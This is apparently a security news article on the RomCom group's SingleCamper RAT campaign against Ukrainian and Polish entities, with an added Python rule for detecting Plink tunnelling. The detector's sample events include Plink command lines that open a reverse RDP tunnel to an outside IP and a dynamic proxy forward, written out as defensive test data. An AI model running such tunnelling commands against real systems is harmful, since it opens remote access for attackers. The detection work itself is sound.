RomCom Threat Actor Targets Ukrainian and Polish Entities with New Cyber Attacks

Cedric Nelson

The Russian cyber threat group RomCom has been linked to a series of cyber attacks targeting Ukrainian government agencies and Polish organizations since late 2023. These intrusions feature the use of a new RomCom Remote Access Trojan (RAT) variant called SingleCamper, also known as SnipBot or RomCom 5.0, according to a report by Cisco Talos.

New Malware Variant: SingleCamper

Cisco Talos is tracking the threat under the codename UAT-5647. Security researchers Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer, and Vitor Ventura explain that this variant is loaded directly from the registry into the system’s memory and communicates via a loopback address to its loader, enhancing its stealth and persistence capabilities.

RomCom, also known by aliases such as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has been conducting multi-purpose cyber operations since 2022. These operations range from ransomware and extortion to credential gathering, signaling a blend of financial and espionage motives. The group's attack tempo has ramped up in recent months, emphasizing long-term persistence and data exfiltration.

Expanding Toolset

The RomCom group is expanding its tooling and infrastructure to support a variety of malware components written in multiple programming languages such as C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE). This expansion underscores their adaptability across different platforms and environments.

The attack chains often begin with spear-phishing emails, which deliver a downloader—either MeltingClaw (written in C++) or RustyClaw (written in Rust)—designed to deploy the ShadyHammock and DustyHammock backdoors, respectively. To maintain the illusion of legitimacy, a decoy document is presented to the victim.

Backdoor Functionality

DustyHammock contacts a command-and-control (C2) server and lets the operator run arbitrary commands and download additional files. ShadyHammock is an earlier-stage backdoor: it deploys SingleCamper and listens for incoming commands. Talos assesses ShadyHammock to be the predecessor of DustyHammock, with the latter still observed in attacks as recently as September 2024.

SingleCamper’s Role

The SingleCamper RAT carries out a range of post-compromise activities, including downloading PuTTY's Plink tool to establish remote tunnels with attacker-controlled infrastructure, conducting network reconnaissance, performing lateral movement, discovering user and system information, and exfiltrating data. This behavior is part of RomCom’s strategy to establish long-term access to compromised networks for espionage purposes, while also potentially deploying ransomware for financial gain.
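Plink is a legitimate, signed PuTTY component, so the hunting signal is not the binary itself but how it is invoked: a port-forwarding switch (`-R`, `-L` or `-D`) combined with an SSH target outside the organisation. The script below is an added example written for this article, not code from Cisco Talos or from the RomCom toolset. It runs a rule of that shape over constructed process-creation events loosely modelled on Sysmon Event ID 1 (the events, the `.corp.example` DNS zone, the hosts and the pids are all made up), and it keys on Plink-only switches such as `-batch` and `-pw` so that a renamed copy of the binary is still caught.

```python
import ipaddress
import ntpath
import re
import shlex
from typing import Dict, List, Optional, Tuple

# Switches OpenSSH does not have. Their presence on any image name is a
# strong hint that the binary is Plink, even if it has been renamed.
PLINK_ONLY_SWITCHES = {"-batch", "-pw", "-pwfile", "-hostkey", "-ssh"}

# Port-forwarding switches. -R turns the compromised host into an inbound
# tunnel endpoint for whoever controls the SSH server.
FORWARD_SWITCHES = {"-R": "remote", "-L": "local", "-D": "dynamic"}

TARGET_RE = re.compile(r"^(?P<user>[^@\s]+)@(?P<host>[^@\s]+)$")

# Assumed internal address space and DNS zone; adjust for a real estate.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
INTERNAL_SUFFIXES = (".corp.example",)

# Constructed sample events (not from any real incident).
SAMPLE_EVENTS = [
    {"pid": 4312, "image": r"C:\Users\anna\AppData\Local\Temp\plink.exe",
     "cmdline": r"plink.exe -N -batch -pw hunter2 -R 0.0.0.0:3389:127.0.0.1:3389 user@203.0.113.45 -P 443"},
    {"pid": 2208, "image": r"C:\Program Files\PuTTY\plink.exe",
     "cmdline": r'"C:\Program Files\PuTTY\plink.exe" -ssh admin@bastion.corp.example'},
    {"pid": 7740, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\anna\report.docx"},
    {"pid": 5130, "image": r"C:\Users\anna\AppData\Roaming\svc\p.exe",
     "cmdline": r"p.exe -batch -hostkey SHA256:AAAA -D 1080 root@198.51.100.7"},
]


def host_is_internal(host: str) -> bool:
    """True for RFC 1918 / loopback addresses or hosts in the internal DNS zone."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return host.lower().endswith(INTERNAL_SUFFIXES)
    return any(addr in net for net in INTERNAL_NETS)


def analyse_event(event: Dict[str, object]) -> Optional[Dict[str, object]]:
    """Return a finding for a suspicious Plink invocation, or None."""
    cmdline = str(event["cmdline"])
    try:
        tokens = shlex.split(cmdline, posix=False)   # keep Windows quoting intact
    except ValueError:                                # unbalanced quotes
        tokens = cmdline.split()
    image_name = ntpath.basename(str(event["image"])).lower()
    looks_like_plink = image_name == "plink.exe" or any(t in PLINK_ONLY_SWITCHES for t in tokens)
    if not looks_like_plink:
        return None

    forwards: List[Tuple[str, str]] = []
    for i, tok in enumerate(tokens):
        if tok in FORWARD_SWITCHES and i + 1 < len(tokens):
            forwards.append((FORWARD_SWITCHES[tok], tokens[i + 1]))

    target_host = None
    for tok in tokens:
        m = TARGET_RE.match(tok.strip('"'))
        if m:
            target_host = m.group("host")
            break
    external = target_host is not None and not host_is_internal(target_host)

    if external and any(kind == "remote" for kind, _ in forwards):
        severity = "high"      # inbound tunnel from attacker infrastructure
    elif external and forwards:
        severity = "medium"    # local/dynamic forward to an outside host
    elif external or forwards:
        severity = "low"
    else:
        return None            # plain SSH to an internal host: likely admin use
    return {"pid": event["pid"], "image": image_name, "severity": severity,
            "target": target_host, "forwards": forwards,
            "renamed": image_name != "plink.exe"}


def scan_events(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Run analyse_event over a batch and keep only the findings."""
    return [f for f in (analyse_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

Two of the four constructed events are flagged: the reverse tunnel to an outside IP is rated high, and the renamed binary with a dynamic forward is rated medium, while Plink to an internal bastion without forwarding is ignored. In production this rule would be fed from the EDR or Sysmon process-creation stream and paired with a network-connection rule for the same pid, since an operator can also set up the forward interactively after the process starts.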

The malware’s keyboard language checks suggest that Polish entities were also targeted in these attacks, though the focus remains on Ukrainian high-profile entities.

CERT-UA Warns of Additional Attacks

This RomCom campaign coincides with an alert from Ukraine's Computer Emergency Response Team (CERT-UA) regarding a threat actor called UAC-0050. This group has been responsible for a surge in financial theft and data-stealing attacks in recent months. UAC-0050 uses malware families like Remcos RAT, SectopRAT, Xeno RAT, Lumma Stealer, Mars Stealer, and Meduza Stealer to compromise systems, particularly targeting accountants at Ukrainian enterprises.

CERT-UA noted that during September - October 2024, UAC-0050 made at least 30 attempts to steal funds from Ukrainian businesses by leveraging remote banking systems to make fraudulent financial payments.

In addition, CERT-UA has identified efforts to distribute Meduza Stealer malware through the @reserveplusbot account on the Telegram messaging app, which falsely claims to offer technical support for the Reserve+ app. This app enables Ukrainian conscripts and reservists to update their personal data remotely, and the fraudulent account mimicked legitimate support channels as recently as May 2024.

The cyber landscape continues to evolve with the RomCom threat actor refining its tools and targeting both Ukrainian and Polish entities with advanced malware like SingleCamper. Organizations in the affected regions are urged to strengthen their defenses against spear-phishing campaigns, enhance malware detection, and implement stronger security protocols to thwart long-term access and data theft.


© 2016 – 2026 Red Secure Tech Ltd. Registered in England and Wales — Company No: 15581067